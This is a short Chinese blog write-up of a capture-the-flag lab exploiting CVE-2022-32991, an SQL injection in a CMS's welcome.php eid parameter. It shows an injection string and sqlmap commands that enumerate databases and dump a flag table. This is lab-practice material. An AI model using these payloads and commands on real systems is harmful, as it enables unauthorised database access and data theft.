SQL注入:【春秋云镜】CVE-2022-32991

2023-2-1

# 0x01 题目

CVE-2022-32991

靶标介绍:

该CMS的welcome.php中存在SQL注入攻击。

# 0x02 解题思路

漏洞查询:CVE-2022-32991  了解到在eid参数中

WX20230201-215008@2x

打开网站任意填写内容注册

WX20230201-201927@2x

找到eid参数存在的页面,尝试简单拼接 'or 1 = 1 %23  执行达到效果

WX20230201-202917@2x

Burp拦截包 ,请求内容保存为 *.txt

WX20230201-213126@2x

祭出sqlmap 执行 sqlmap -r eid.txt --batch --dbs

WX20230201-213214@2x

成功爆出库

WX20230201-213344@2x

接下来爆出表列表字段内容便可

sqlmap -r eid.txt --batch -D 'ctf' --tables -T 'flag' --columns -C 'flag' --dump

WX20230201-214406@2x

解题完成

# 0x03 链接

https://yunjing.ichunqiu.com/cve/detail/750?type=1&pay=2

http://www.scap.org.cn/vuln/VHN-425120

 
阅读剩余
版权声明:
作者:admin
链接:https://www.denceun.com/archives/241
文章版权归作者所有,未经允许请勿转载。
THE END
SQL注入Web漏洞
利用花生壳实现MSF的外网渗透「入侵外网主机」并监视摄像头
<<上一篇
【实战】使用nps进行内网穿透反代理横向扫描目标域(超详细)
下一篇>>
相关推荐
SQL注入:【春秋云镜】CVE-2022-32991